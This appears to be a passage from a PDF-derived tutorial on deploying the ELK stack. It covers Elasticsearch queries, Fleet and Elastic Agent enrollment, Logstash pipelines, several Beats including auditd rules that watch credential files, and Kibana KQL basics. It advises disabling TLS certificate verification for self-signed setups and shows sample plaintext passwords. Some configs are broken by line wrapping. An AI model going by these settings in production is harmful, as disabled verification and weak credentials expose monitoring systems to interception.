   assign common permissions to them.
     The   roles.yml   file defines the roles and their
     privileges, while the   roles_mapping.yml        file maps
     roles to users.
Setting IP and Port for Elastic Search
When you open   elasticsearch.yml , you need to
change   network.host and http.port to your
desired settings. If you are running Elasticsearch
locally, you can use   127.0.0.1   and a port of
your choice.
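For example, a local-only listener in   elasticsearch.yml   could look like (values are illustrative):
 network.host: 127.0.0.1
 http.port: 9200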
Verifying Installation
Hit the Elasticsearch endpoint on port 9200 to confirm it is
running.
On a shell, run the following:
 curl localhost:9200
 curl localhost:9200/_cluster/health
A sample healthy output:
 {
 "cluster_name":"elasticsearch",
 "status":"green",
 "timed_out":false,
 "number_of_nodes":1,
 "number_of_data_nodes":1,
 "active_primary_shards":0,
 "active_shards":0,
 "relocating_shards":0,
 "initializing_shards":0,
 "unassigned_shards":0,
 "delayed_unassigned_shards":0,
 "number_of_pending_tasks":0,
 "number_of_in_flight_fetch":0,
 "task_max_waiting_in_queue_millis":0,
 "active_shards_percent_as_number":100.0
 }
Executing Search Queries in Elastic Search
This section is especially useful for data analysts,
developers and site reliability engineers as it explains
running search queries on datasets.
First make sure you have followed the steps above to
understand how to create an index, mappings and run
basic queries to retrieve data.
Executing queries
Assuming that you have created an index and added data,
you can now start executing search queries.
For full references on supported search queries, check the
below link:
 https://www.elastic.co/guide/en/elasticsearch/
 reference/8.0/query-dsl.html
Example query: retrieving cars with BMW model
Below we search the dataset stored in    cars   index and
use  term to search fields in the dataset. The field name
is car_model and we are looking for values matching
 BMW
 GET cars/_search
 {
         "query": {
             "term": {
                 "car_model": { "value": "BMW"
 }
         }
     }
 }
A more complex version of this search may include
searching for cars whose model is not   BMW   and whose
color is   red .
Below we use   bool   because we want to combine two
compound clauses (model and color). The   must   and
must_not   clauses are used to exclude values matching
BMW   and to include values matching   Red .
 GET cars/_search
 {
     "query": {
         "bool": {
             "must_not": [
                 { "term": {
                     "car_model": { "value": "BMW" }
                     }
                 }
             ],
             "must": [
                 { "term": {
                     "car_color": { "value": "Red" }
                     }
                 }
             ]
         }
     }
 }
Let's say we want to extract all information about cars that have a specific feature, such as biometric features.
Below we perform a full-text search looking for the string biometric in the specific_feature field and return any matches:
 GET cars/_search
 {
   "query": {
     "match": {
       "specific_feature": {
         "query": "biometric"
       }
     }
   }
 }
You can also restrict the results to a given date range, as shown below:
 GET cars/_search
 {
   "query": {
     "range": {
       "@timestamp": {
         "gte": "2023-01-23T00:00:00.000Z",
         "lt": "2024-01-24T00:00:00.000Z"
       }
     }
   }
 }
Remember to check the reference URL below for more use
cases and supported queries
 https://www.elastic.co/guide/en/elasticsearch/
 reference/8.0/query-dsl.html
Understanding Aggregations
Aggregations allow you to summarize large volumes of data into something easier to consume. Elasticsearch can perform two primary types of aggregations:
• Metric aggregations calculate metrics such as count, sum, min, max, and average on numeric data.
• Bucket aggregations organize large datasets into groups depending on the value of a field. Buckets can be created based on field values, value ranges, date ranges, and more.
Full list of aggregations can be found below:
 https://www.elastic.co/guide/en/elasticsearch/
 reference/8.0/search-aggregations.html
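To make this concrete, here is a sketch combining both types against the cars index from the earlier examples: a terms bucket aggregation over car_model with a nested avg metric aggregation (the price field is an assumption for illustration):

```
GET cars/_search
{
  "size": 0,
  "aggs": {
    "models": {
      "terms": { "field": "car_model" },
      "aggs": {
        "avg_price": { "avg": { "field": "price" } }
      }
    }
  }
}
```

This returns one bucket per car_model value, each carrying a document count and the average price of the documents in that bucket.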
Ingesting Logs
Log ingestion is the process of adding data and logs from various sources (Windows, Linux, macOS, network devices, etc.) to Elasticsearch and Kibana for processing and analysis.
With Elastic Agent
Elastic Agent is a single, unified way to add monitoring
for logs, metrics, and other types of data to a host.
It's recommended to install the agent on workstations
that you wish to monitor directly.
Tip
I personally prefer deploying Elastic Agent rather than Beats or Logstash for log and data collection, simply because it reduces the administrative overhead of deploying, managing, and upgrading multiple agents across your environment.
Understanding Fleets
Fleet is a component that's used to manage Elastic Agent
configurations across your
environment.
Fleet is made up of two components:
•   Fleet UI   is a Kibana application with a user interface
for users to onboard and configure agents, manage the
onboarded data, and administer agents across your
environment.
•   Fleet Server   is a backend component that Elastic
Agents from across your environment can connect to, to
retrieve agent policies, updates, and management
commands.
Understanding Agent Policy
An agent policy is a YAML file that defines the various inputs and settings that an agent will collect and ship to Elasticsearch (or another supported destination). When you're using Elastic Agent in standalone mode, the policy can be configured using the /etc/elastic-agent/elastic-agent.yml file. When an agent is managed by Fleet, the policy is retrieved from Elasticsearch and automatically applied to the agent when it starts up.
The Fleet interface on Kibana can be used to create and
manage agent policies. Once a policy has been created,
users can add integrations that define the data sources to
be collected by the agent.
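For standalone mode, a minimal policy sketch might look like the following (hosts, credentials, and paths are placeholders, and the exact schema can vary between agent versions):

```yaml
outputs:
  default:
    type: elasticsearch
    hosts: ["https://localhost:9200"]
    username: "elastic"
    password: "changeme"

inputs:
  # Ship a local log file to the default output
  - type: logfile
    id: syslog-input
    streams:
      - paths:
          - /var/log/syslog
```

A Fleet-managed agent receives an equivalent policy automatically, so this file only matters for standalone deployments.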
Setting up Fleet server to manage agents
Before creating a fleet server, you need to enable security
components in your ELK setup.
Check out the link below for detailed instructions on
security components of ELK.
 https://www.elastic.co/guide/en/elasticsearch/
 reference/8.0/
 configuring-stack-security.html
Then follow below steps to create the fleet server:
     Log into Kibana as the elastic user and navigate to
     the Fleet app on Kibana, under the    Management
     section in the sidebar.
     Click on the   Agents   tab on the Fleet application. Go
     to the download page and download Elastic Agent for
     your operating system.
     On the Fleet application, click on Fleet settings in
     the top-right corner and do the following:
     Set the value for the Fleet Server host to
 https://<Your-Host-IP>:8220
Fleet Server will listen on port 8220 when installed.
Set the value for Elasticsearch hosts to
 https://<Your-Host-IP>:9200
Elasticsearch listens on port 9200 by default.
If you're using a self-signed certificate on your
Elasticsearch cluster, add the following line to the
Elasticsearch output configuration option. This disables
the verification of the SSL certificate but still encrypts
communication to Elasticsearch.
 ssl.verification_mode: none
Check below figure for reference:
   On Kibana, click Generate a service token to create
   an enrollment key for Fleet Server. This enrollment
   key will be used to authenticate the Fleet Server
   instance with Kibana upon enrollment. Once
   generated, Kibana should also display the command
   to use for Fleet Server installation and enrollment:
   Copy the installation command and execute it on the
   Fleet Server host inside the elastic-agent directory:
 sudo ./elastic-agent install -f \
   --fleet-server-es=https://34.151.73.248:9200 \
   --fleet-server-service-token=<Your-Enrollment-Token>
After successful enrollment, you should see the Fleet Server available in Kibana.
You can now enroll Elastic Agent to collect data from
across your environment and use Fleet Server to manage
your agents. You can also enroll multiple Fleet Server
instances to scale the number of agents you can manage
or increase availability for Fleet.
Creating an Elastic Agent using the fleet server
     Navigate to Fleet on Kibana and click on the Agents
     tab. Click on Add Agent to continue.
     Now, on the machine you want to collect logs from,
     execute the below commands (assuming it's a Linux
     machine) to install the agent:
 curl -L https://artifacts.elastic.co/downloads/beats/elastic-agent/elastic-agent-8.0.0-linux-x86_64.tar.gz -o agent.tar.gz
 tar -xzf agent.tar.gz
      Copy the automatically generated command and
      execute it on the host running the sample application
      in the elastic-agent directory
 sudo ./elastic-agent install -f --url=https://34.151.73.248:8220 --enrollment-token=<Your-Enrollment-Token>
Once finished, you should see the host in Kibana
TIP
You will need to add the --insecure flag at the end of your enrollment command if you are using a self-signed certificate on Fleet Server. Communications to Fleet Server are still encrypted, but the agent skips establishing trust with the certificate authority being used.
Creating an Elastic Agent using integrations
Follow the steps below to create an elastic agent:
      Log in to Kibana
      Go to Add integrations, search for system and
      select Add System
      Add a name and description that fits the scenario.
     Make sure that Collect logs from System
     instances and Collect metrics from System
     instances are turned on.
     Make sure to add the paths to the logs you wish to
     monitor depending on the endpoint. An example is
     shown below
     When it’s done, you’ll have an agent policy that
     contains a system integration policy for the
     configuration you just specified.
     In the popup, click Add Elastic Agent to your
     hosts to open the Add agent flyout then choose
     enroll in fleet
     Download, install, and enroll the Elastic Agent on
     your host by selecting your host operating system
     and following the Install Elastic Agent on your
     host step.
An example figure is shown below:
To confirm successful enrollment of the agent, click View assets to access dashboards related to the System integration.
Choose a dashboard related to the operating system of your monitored system.
Lastly, open the [Metrics System] Host overview dashboard to view performance metrics from your host system.
If you wish to add more log paths, such as Nginx or Apache logs, just repeat the steps above: add a new integration, search for the product name (for example, Nginx), and specify the path to the Nginx logs on your endpoint. Under Where to add this integration, select Existing hosts, then select the agent policy you created earlier. That way, the change is deployed to the agent that's already running.
With Logstash
Logstash is a data processing engine used to take data from different sources, apply filters to it or normalize it, and then send it to a destination such as Elasticsearch or a listening port. A Logstash configuration file is divided into three parts, as shown below.
Logstash is the equivalent of an indexer in
Splunk
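Every pipeline file follows the same three-part skeleton. A minimal do-nothing sketch that reads events from stdin and prints them back to stdout:

```
input  { stdin { } }
filter { }
output { stdout { codec => rubydebug } }
```

The sections below fill in each of these three parts with real plugins.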
The input part is where the user defines the source from
which the data is being ingested. Logstash supports many
input plugins as shown in the
reference https://www.elastic.co/guide/en/logstash/8.1
/input-plugins.html
Example Input Plugins
 File:
 Reads data from files in real-time or as a
 batch. Useful for ingesting log files or other
 structured data stored on the local file
 system.
 TCP:
 Listens for incoming TCP connections and reads
 data from them. Useful for receiving data from
 network devices or other systems over TCP.
 HTTP:
 Acts as a web server and reads data
 from HTTP requests. Useful for receiving data
 from webhooks, REST APIs, or other HTTP-based
 sources.
The filter part is where the user specifies the filter
options to normalize the log ingested above. Logstash
supports many filter plugins as shown in the reference
documentation https://www.elastic.co/guide/en/logstash
/8.1/filter-plugins.html
Example Filter Plugins
 Grok:
 Parses unstructured log data using custom
 patterns and extracts structured fields from
 it.
 Date:
 Parses and manipulates dates and timestamps in
 event fields. Allows you to extract, format,
 or convert timestamps to a desired
 configuration.
The output part is where the user defines where the filtered data should be sent. It can be a listening port, the Kibana interface, an Elasticsearch database, a file, etc. Logstash supports many output plugins, as shown in the reference documentation https://www.elastic.co/guide/en/logstash/8.1/output-plugins.html
Installing and Configuring Logstash
If you wish to follow the official instructions, use the link below, or follow along with the instructions provided in this guide.
 https://www.elastic.co/guide/en/logstash/curre
 nt/getting-started-with-logstash.html
Installation
After you download the package file, execute the below
command as root
 dpkg -i logstash.deb
You can then configure Logstash to start when the system starts:
 systemctl daemon-reload
 systemctl enable logstash.service
 systemctl start logstash.service
 systemctl status logstash.service
Configuration
Logstash Config Files
The /etc/logstash directory is the default location for the important configuration files, which are:
logstash.yml :    This is the main configuration file
for Logstash. It contains global settings and options
for Logstash, such as network settings, logging
configurations, pipeline configuration paths, and
more.
jvm.options :    This file contains the Java Virtual
Machine (JVM) options for Logstash. You can use it
to configure parameters like memory allocation,
garbage collection settings, and other JVM-related
options.
log4j2.properties :        Logstash uses the Log4j2
framework for logging. This file allows you to
configure the logging behavior, including log levels,
log outputs (such as console or file), log file
locations, and more.
pipelines.yml :     If you are running multiple
pipelines in Logstash, this file is used to define and
configure them.
conf.d/ :   This directory is often used to store
individual pipeline configuration files. You can create
separate configuration files within this directory,
each defining a specific data processing
pipeline. Logstash will load and process these
configuration files in alphabetical order, so it’s
common to prefix them with numbers to control the
processing order.
patterns/ :   This directory stores custom patterns
that can be used in Logstash’s grok filter. Grok is a
powerful pattern-matching and extraction tool
in Logstash, and you can define your own patterns
in separate files within this directory.
     startup.options :    This file contains additional
     options and arguments that can be passed
     to Logstash during startup.
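As an illustrative sketch of the patterns/ directory described above (the pattern name and regex here are invented for the example), a custom pattern file could contain:

```
# /etc/logstash/patterns/custom: defines a reusable pattern named SESSIONID
SESSIONID [A-Fa-f0-9]{32}
```

A grok filter can then load it with `patterns_dir => ["/etc/logstash/patterns"]` and reference it as `%{SESSIONID:session_id}` inside its match expression.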
Configuring auto reload
Open logstash.yml and go to the Pipeline Configuration Settings section, where you need to uncomment the below variables and set their values as follows:
   1. config.reload.automatic: true
   2. config.reload.interval: 3s
Then lastly execute the below command:
 systemctl restart logstash.service
Creating a sample pipeline to ingest log data from a TCP port on an Apache server
When we want to create a custom data stream to ingest data from a specific data source, we have to create a custom config file and place it under /etc/logstash/conf.d/.
Let's say we want to ingest JSON-formatted data arriving on TCP port 4545 of an Apache server. Using the documentation links referenced above, we can create a custom file named tcp.conf with the below content:
 input {
   tcp {
     port => 4545
   }
 }

 filter {
   json {
     source => "message"
   }
 }

 output {
   elasticsearch {
     hosts => ["localhost:9200"]
     user => "elastic"
     password => "password"
     # index names must be lowercase
     index => "apache"
     pipeline => "apache"
   }
 }
We started with the input plugin and defined the TCP port. Afterwards, we used the filter plugin to define the format of the data source, in our case JSON. The JSON filter plugin requires a source option, for which we used message as the value. Lastly, we used the output plugin to tell Logstash to send the ingested logs to Elasticsearch, which is running on localhost port 9200, and we named the index apache (note that Elasticsearch index names must be lowercase).
Lastly, you can run Logstash with the above config file:
 /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/tcp.conf
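To smoke-test the pipeline, you can hand-craft a JSON event of the kind the json filter expects and ship it to the listener with nc (the field names are invented for the example; the nc send is skipped harmlessly if no listener is running):

```shell
# A sample JSON event for the tcp.conf pipeline to parse
event='{"clientip":"10.0.0.5","verb":"GET","response":200}'
echo "$event"
# Send it to the Logstash TCP input on port 4545 if one is listening
{ echo "$event" | nc -w1 localhost 4545; } 2>/dev/null || true
```

If the pipeline is running, the event should appear shortly afterwards in the configured index.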
Configuring Logstash to ingest logs from a CSV file and send the output to another CSV file
 input {
   file {
     path => "/home/Desktop/web_attacks.csv"
     start_position => "beginning"
     sincedb_path => "/dev/null"
   }
 }

 filter {
   csv {
     separator => ","
     columns => ["timestamp", "ip_address", "request", "referrer", "user_agent", "attack_type"]
   }
 }

 output {
   file {
     path => "/home/Desktop/updated-web-attacks.csv"
   }
 }
Another example: ingesting /var/log/auth.log and normalizing the syslog timestamp with the date filter:

 input {
   file {
     path => "/var/log/auth.log"
     start_position => "beginning"
     sincedb_path => "/dev/null"
   }
 }

 filter {
   if [message] =~ /^(\w{3}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})/ {
     # Extract the syslog timestamp and use it as the event timestamp
     date {
       match => [ "message", "MMM d HH:mm:ss", "MMM dd HH:mm:ss" ]
       target => "@timestamp"
     }
   }
 }

 output {
   file {
     path => "/root/home/Desktop/logstash_output.log"
   }
 }
With Beats
All Beats store their configuration under the /etc/ directory.
For example, when you install Filebeat, its configuration will be stored at /etc/filebeat/.
Bear in mind that you can install modules for the Beats, which extend your log collection functionality so that you can collect logs from many sources.
These modules, say the modules for Filebeat, are created and located under /etc/filebeat/modules.d/
Types of Beats
• Filebeat: Collecting log data.
• Metricbeat: Collecting metric data.
• Packetbeat: Decoding and collecting network packets.
• Heartbeat: Collecting system/service uptime and latency
data.
• Auditbeat: Collecting OS audit data.
• Winlogbeat: Collecting Windows event, application, and
security logs.
• Functionbeat: Running data collection on serverless
compute infrastructure such as AWS Lambda
Installation and Configuration
Definition
Beats is a set of data-shipping agents used to collect data from multiple endpoints: Winlogbeat, for example, is used to collect Windows event logs, while Packetbeat collects network traffic flows.
Beats is the equivalent of a forwarder in
Splunk
Beats are host-based agents, known as data shippers, used to ship/transfer data from the endpoints to Elasticsearch.
Each Beat is a single-purpose agent that sends specific data to Elasticsearch.
Installation
Follow along the link below that contains the instructions
to install beats
 https://www.elastic.co/guide/en/beats/libbeat/
 current/getting-started.html
Configuration
Depending on the beat that you have installed from the link
above, you may proceed and create/edit the configuration
file and add the log source.
Example: Ingesting Nginx Logs
    1. Install Filebeat on the Nginx server host.
    2. The Filebeat agent can be configured from the
       filebeat.yml file located in the /etc/filebeat/
       directory on Linux installations, or in the config/
       directory for tar archives.
       For example, below is a sample filebeat.yml
       config file that ingests logs from an Nginx webserver:
 filebeat.config.modules:
   # Glob pattern for configuration loading
   path: /etc/filebeat/modules.d/nginx.yml

 filebeat.inputs:
   - type: log
     paths:
       - /path/to/your/logfile.log

 output.elasticsearch:
   hosts: ["http://localhost:9200"]
   protocol: "http"
   username: "filebeat_internal"
   password: "YOUR_PASSWORD"
   index: "filebeat"
  3. Nginx modules can be found at
      /etc/filebeat/modules.d/nginx.yml and
     below is an example config file:

 - module: nginx
   access:
     enabled: true
     var.paths: ["/path/to/log/nginx/access.log*"]
   error:
     enabled: true
     var.paths: ["/path/to/log/nginx/error.log*"]
 4. Lastly enable the Nginx module:
filebeat modules enable nginx
 5. Load the necessary nginx module artifacts into
    Elasticsearch and Kibana to ingest and visualize the
    data. This step needs to be done once per
    Elasticsearch deployment (or whenever a new
    module is activated). Run the following command
    to run the setup process (replacing localhost with
    your Kibana endpoint):
 filebeat setup -E "setup.kibana.host=localhost:5601" --modules nginx --dashboards --pipelines
   6. After saving the file, run the service:
 systemctl start filebeat
 # OR
 sudo service filebeat start
   7. Confirm the logs are visible on the Discover app in
      Kibana. You can visit the web page on your web
      server to generate traffic and corresponding log
      events to validate your ingestion pipeline.
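For reference, this is the shape of a combined-format Nginx access log line that the pipeline above ingests. The awk one-liner (independent of Filebeat, shown only to illustrate the fields) pulls out the client IP, request method, and status code:

```shell
# A typical combined-format access log line
line='127.0.0.1 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "curl/7.81.0"'
# Strip the quotes, then print client IP ($1), method ($6) and status ($9)
echo "$line" | awk '{gsub(/"/,""); print $1, $6, $9}'
# → 127.0.0.1 GET 200
```

The Nginx module's ingest pipeline parses these same fields (and more) into structured ECS fields automatically.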
Example: Monitoring Nginx Health Metrics
   1. Edit the /etc/nginx/sites-enabled/default file and
      add the following code block to the file:
 server {
     server_name 127.0.0.1;
     location /server-status {
         stub_status;
         allow 127.0.0.1;
         deny all;
     }
 }
   2. Restart Nginx server:
systemctl restart nginx
 3. Install the Metricbeat agent on the host running the
    workload to be monitored. Check below link for
    instructions:
https://www.elastic.co/guide/en/beats/metricbe
at/current/metricbeat-installation-
configuration.html
  4. Open metricbeat.yml and set up Metricbeat to
     load configuration modules from the
     /etc/metricbeat/modules.d/ directory, so that the
     final config file looks like the one below:
 metricbeat.config.modules:
   # Glob pattern for configuration loading
   path: ${path.config}/modules.d/*.yml

 output.elasticsearch:
   # Array of hosts to connect to.
   hosts: ["localhost:9200"]
   # Protocol - either `http` (default) or `https`.
   #protocol: "https"
   username: "elastic"
   password: "password"

 processors:
   - add_host_metadata: ~
   - add_cloud_metadata: ~
 5. Enable the nginx module to collect metrics from the
    web server
metricbeat modules enable nginx
 6. Edit the
     /etc/metricbeat/modules.d/nginx.yml         (check
    the previous example of collecting nginx logs) file
    to include the following parameters:
 - module: nginx
   metricsets:
     - stubstatus
   period: 10s
   # Nginx metrics API
   hosts: ["http://127.0.0.1"]
 7. Enable the system module to collect metrics from
    the host operating system.
metricbeat modules enable system
 8. Edit the
     /etc/metricbeat/modules.d/system.yml         file to
    include the required metric sets
 - module: system
   period: 10s
   metricsets:
     - cpu
     - load
     - memory
     - network

 - module: system
   period: 1m
   metricsets:
     - filesystem
     - fsstat

 - module: system
   period: 15m
   metricsets:
     - uptime
  9. Run the Metricbeat setup command to load the
     necessary artifacts, such as index templates and
     dashboards, into your Elasticsearch deployment:
 metricbeat setup -E "setup.kibana.host=localhost:5601"
 10. Start the Metricbeat systemd service to start
     collecting metrics
systemctl start metricbeat
 11. The Metrics app in Kibana can also be used to
     visualize infrastructure and system metrics from
     across your environment:
Also check the [Metricbeat Nginx] Overview and the [Metricbeat System] Overview dashboards.
Example: Ingesting OS logs
Auditbeat leverages the Linux audit framework (auditd) to
consistently and reliably collect audit/security-relevant
data from hosts. The scope of data collection includes the
following:
• Linux kernel events related to unauthorized file access
and remote access.
• Changes on critical files and file paths.
• Packages, processes, sockets, and user activity on the
system.
To start, complete the below steps:
   1. Install Auditbeat on the web server host by
      checking the below link:
 https://www.elastic.co/guide/en/beats/auditbea
 t/current/auditbeat-installation-
 configuration.html
   2. Edit the auditbeat.yml file located in
      /etc/auditbeat. As shown in the sample below, we
      configure Auditbeat to: detect the use of 32-bit
      APIs on a 64-bit host OS, indicating a potential
      attack vector for compromise; monitor changes to
      users and groups; watch for changes to files in
      critical directories on the host, which can indicate
      when binaries and config files are changed; and
      collect information regarding successful/failed
      logins, processes, socket events, and user/host
      information:
 - module: auditd
   audit_rules: |
     -a always,exit -F arch=b32 -S all -F key=32bit-abi
     -a always,exit -F arch=b64 -S execve,execveat -k exec
     -a always,exit -F arch=b64 -S accept,bind,connect -F key=external-access
     -w /etc/group -p wa -k identity
     -w /etc/passwd -p wa -k identity
     -w /etc/gshadow -p wa -k identity

 - module: file_integrity
   paths:
     - /bin
     - /usr/bin
     - /sbin
     - /usr/sbin
     - /etc

 - module: system
   datasets:
     - host    # General host information, e.g. uptime, IPs
     - login   # User logins, logouts, and system boots
     - process # Started and stopped processes
     - socket  # Opened and closed sockets
     - user    # User information
   state.period: 12h

 output.elasticsearch:
   # Array of hosts to connect to.
   hosts: ["localhost:9200"]
   # Protocol - either `http` (default) or `https`.
   #protocol: "https"
   username: "elastic"
   password: "changeme"
   3. Set up Auditbeat artifacts on Elasticsearch and
      Kibana by running the setup command:
 auditbeat setup -E "setup.kibana.host=localhost:5601"
   4. Start the Auditbeat service to initiate the collection
      of audit events:
 systemctl start auditbeat
After a few moments, audit data should be available on
Kibana for you to explore and visualize.
Example: Collecting Network Traffic Using Packetbeat
     Install Packetbeat on the desired host:
 https://www.elastic.co/guide/en/beats/packetbe
 at/current/packetbeat-installation-
 configuration.html
     On the endpoint where you installed Packetbeat,
     navigate to /etc/packetbeat/ and open
     packetbeat.yml
     Set up the network interfaces for Packetbeat to
     monitor. You can use a label (such as eth0) to
     specify an interface or use the any parameter to
     monitor all available interfaces:
packetbeat.interfaces.device: any
   Configure the collection of network flow information.
   The flow in your config file should look similar to the
   one below:
 packetbeat.flows:
   # Set network flow timeout. Flow is killed if no packet
   # is received before being timed out.
   timeout: 30s
   # Configure reporting period. If set to -1, only killed
   # flows will be reported.
   period: 10s
   Configure the protocols and ports that Packetbeat
   should collect and decode from the data being
   sniffed. A sample is shown below:
 packetbeat.protocols:
   - type: icmp
     enabled: true
   - type: dhcpv4
     ports: [67, 68]
   - type: dns
     ports: [53]
   - type: http
     ports: [80]
   Send the data to the Elasticsearch cluster for
   indexing:
 output.elasticsearch:
   # Array of hosts to connect to.
   hosts: ["localhost:9200"]
   # Protocol - either `http` (default) or `https`.
   #protocol: "https"
   username: "elastic"
   password: "pass"
   You could also apply data enrichment as below:
 processors:
   - add_cloud_metadata: ~
   - detect_mime_type:
       field: http.request.body.content
       target: http.request.mime_type
   - detect_mime_type:
       field: http.response.body.content
       target: http.response.mime_type
   Set up the required Packetbeat artifacts on
   Elasticsearch and Kibana
packetbeat setup -E
"setup.kibana.host=localhost:5601"
     Start collecting data by starting the Packetbeat
     systemd service:
 systemctl start packetbeat
Data should be available on Discover to explore and
visualize as expected.
Beats Vs Logstash: Which one to use for
log collection and ingestion?
When to use Beats
• When you need to collect data from a large number of
hosts or systems from across your environment. Some
examples are as follows:
(a) Collecting web logs from a dynamic group of hundreds
of web servers.
(b) Collecting logs from a large number of microservices
running on a container orchestration platform such as
Kubernetes.
(c) Collecting metrics from a group of MySQL instances in
cloud/on-premises locations.
• When there is a supported Beats module available.
• When you do not need to perform a significant amount of transformation/processing before consuming data on Elasticsearch.
• When consuming from a web source and you do not have scaling/throughput concerns beyond a single Beat instance.
When to use Logstash
• When a large amount of data is consumed from a
centralized location (such as a file share, AWS S3, Kafka,
and AWS Kinesis) and you need to be able to scale
ingestion throughput.
• When you need to transform data considerably or parse
complex schemas/codecs, especially using regular
expressions or Grok.
• When you need to be able to load balance ingestion
across multiple Logstash instances.
• When a supported Beats module is not available.
Example: Ingesting Fortinet Firewall Logs
To configure a network firewall such as Fortinet to send logs to your Elasticsearch instance, you would first need to configure the Fortinet firewall to send its logs to the ELK server by enabling the syslog format. Refer to the below page about sending firewall logs in syslog format:
 https://docs.fortinet.com/document/fortigate/6
 .0.0/cli-reference/260508/log-syslogd-
 syslogd2-syslogd3-syslogd4-setting
Next you can choose to send the logs either through Logstash, by creating a UDP/TCP listener, or by using the Fortinet module in Filebeat.
More about Filebeat modules can be found below:
 https://www.elastic.co/guide/en/beats/filebeat
 /current/filebeat-modules-overview.html
Let's say we choose to collect logs through the integration module. The first thing to do is create the configuration file at /etc/filebeat/modules.d/fortinet.yml with the below sample code:
 - module: fortinet
   firewall:
     enabled: true
     var.input: udp
     var.syslog_host: 0.0.0.0
     var.syslog_port: 9004
If you wish to use more variables in the code, take a look
at the below documentation:
 https://www.elastic.co/guide/en/beats/filebeat
 /current/filebeat-module-fortinet.html
Kibana
Kibana is a web-based data visualization platform that works with Elasticsearch to analyze, investigate, and visualize the data stream in real time. It allows users to create multiple visualizations and dashboards for better visibility.
For data and SOC analysts, Kibana is used mainly
to search, analyze and visualize data
Installing and Configuring Kibana
Installation
If you installed Elasticsearch using Docker, then execute the below commands to start Kibana and connect it with the Docker container:
 docker pull docker.elastic.co/kibana/kibana:8.13.4
 docker run --name kibana --net elastic -p 5601:5601 docker.elastic.co/kibana/kibana:8.13.4
Then, using the provided URL, navigate to Kibana in your browser and use the enrollment token that you copied earlier to connect your Kibana instance with Elasticsearch.
To log in to Kibana, use the username and password that were generated during the Elasticsearch installation above.
You can then configure Kibana to start when the system
starts:
 systemctl daemon-reload
 systemctl enable kibana.service
 systemctl start kibana.service
 systemctl status kibana.service
Configuration
Kibana Config Files
The   /etc/kibana     path typically contains the
configuration files for Kibana:
      kibana.yml :    This is the main configuration file for
      Kibana. It contains various settings to customize
      Kibana’s behavior, such as the Elasticsearch server
   URL, server host and port, logging options, security
   configurations, and more. A sample config file for
   Kibana is shown below:
# Port for Kibana webserver to listen on
server.port: 5601
# Address/interface for Kibana to bind to.
server.host: 0.0.0.0
# List of Elasticsearch nodes for Kibana to
connect to.
# In a multi node setup, include more than 1
node here (ideally
a data node)
elasticsearch.hosts:
["http://elasticsearch1.host:9200",
"http://elasticsearch2.host:9200"]
# Credentials for Kibana to connect to
Elasticsearch if
security is setup
elasticsearch.username: "kibana_system"
elasticsearch.password: "kibana_password"
   kibana.keystore :        This file securely stores
   sensitive configuration settings, such as passwords
   and API keys. The       kibana.keystore        file provides
   a safer alternative to storing sensitive information in
   plain text within the    kibana.yml       file. It is
   encrypted and can be managed using
   the   bin/kibana-keystore            command-line tool.
   Configuring server IP and Port
      Open   kibana.yml   and go to
      the   System: Kibana Server   section and make
      changes to the below variables:
      server.port: 5601   => Kibana runs on port 5601
      by default.
      server.host: "0.0.0.0"   => note that if the server
      IP is changed, it should be updated here.
Then, lastly, we restart Kibana:
 systemctl restart kibana.service
If Kibana asks for a verification code when you
try to load it in the browser, run the below command
to get one:
 /usr/share/kibana/bin/kibana-verification-code
Kibana Components
     Discover tab
     Visualization
     Dashboard
Discover Tab
Below is the Discover tab with its components numbered and
explained:
1. Logs (document): Each log here is also known as
   a single document containing information about the
   event. It shows the fields and values found in that
   document.
2. Fields pane: Left panel of the interface shows the
   list of the fields parsed from the logs. We can
   click on any field to add the field to the filter or
   remove it from the search.
3. Index Pattern: Lets the user select the index
   pattern from the available list.
4. Search bar: A place where the user adds search
   queries / applies filters to narrow down the
   results.
5. Time Filter: We can narrow down results based on
   the time duration. This tab has many options to
   select from to filter/limit the logs.
6. Time Interval: This chart shows the event counts
   over time.
7. TOP Bar: This bar contains various options to save
   the search, open the saved searches, share or
   save the search, etc.
Fields
The left panel of the Kibana interface shows the list of the
normalized fields it finds in the available documents/logs.
Click on any field, and it will show the top 5 values and
the percentage of the occurrence.
Tables
By default, the documents are shown in raw form. We can
click on any document and select important fields to
create a table showing only those fields. This method
reduces the noise and makes it more presentable and
meaningful.
KQL (Kibana Query Language)
It is a search query language used to search the ingested
logs/documents in Elasticsearch. Apart from KQL,
Kibana also supports the Lucene query language, and you
can switch between the two from the search bar's settings.
KQL is similar in concept and purpose to Splunk's Search
Processing Language (SPL).
Reserved Characters in KQL
Reserved characters
in ELK include   + , - , = , && , || , & , |     and   !.
For instance, using the       +    character in a query will result
in an error; to escape this character, precede it with a
backslash (e.g.       \+ ).
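To make the escaping rule concrete, here is a small Python sketch that backslash-escapes the reserved characters named above before they are embedded in a query string (the function name and the restricted character set are illustrative, not an Elastic API):

```python
# Sketch: escape the KQL/Lucene reserved characters named above before
# embedding untrusted input in a query string. The reserved set below is
# limited to the single characters listed in these notes; escaping each
# '&' and '|' individually also neutralizes '&&' and '||'.
RESERVED = set("+-=&|!")

def escape_kql(term: str) -> str:
    """Precede each reserved character with a backslash."""
    return "".join("\\" + ch if ch in RESERVED else ch for ch in term)

print(escape_kql("1+1"))  # 1\+1
```

Escaping each character individually is a simplification; for a production query builder you would follow the full Elasticsearch escaping rules.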
WildCards in KQL
Wildcards are another concept that can be used to filter
data in ELK. Wildcards match specific characters within a
field value. For example, using the           *   wildcard will
match any number of characters, while using
the    ?    wildcard will match a single character.
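The `*` and `?` semantics above behave like shell-style wildcards, which can be demonstrated with Python's `fnmatch` module (a stand-in for illustration, not how Elasticsearch matches internally):

```python
from fnmatch import fnmatchcase

# '*' matches any run of characters, '?' matches exactly one character,
# mirroring the KQL wildcard semantics described above.
print(fnmatchcase("United Nations", "United*"))  # True
print(fnmatchcase("log1", "log?"))               # True
print(fnmatchcase("log12", "log?"))              # False
```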
Searching The Logs with KQL
Free text Search
Free text search allows users to search for the logs based
on the text-only. That means a simple search of the
term       security   will return all the documents that
contain this term, irrespective of the field.
Wildcard Search
KQL allows the wildcard   *   to match parts of a
term/word. Let's find out how to use this wildcard in
the search query.
Example Search Query:         United*
We have used the wildcard with the term United to return
all results containing United followed by any other
term. If we had logs with the term United Nations, those
would also have been returned as a result of this
wildcard.
Logical Operators (AND | OR | NOT)
KQL also allows users to utilize the logical operators in the
search query. Let us see the examples below.
1- OR Operator
We will use the OR operator to show logs that contain
either the United States or England.
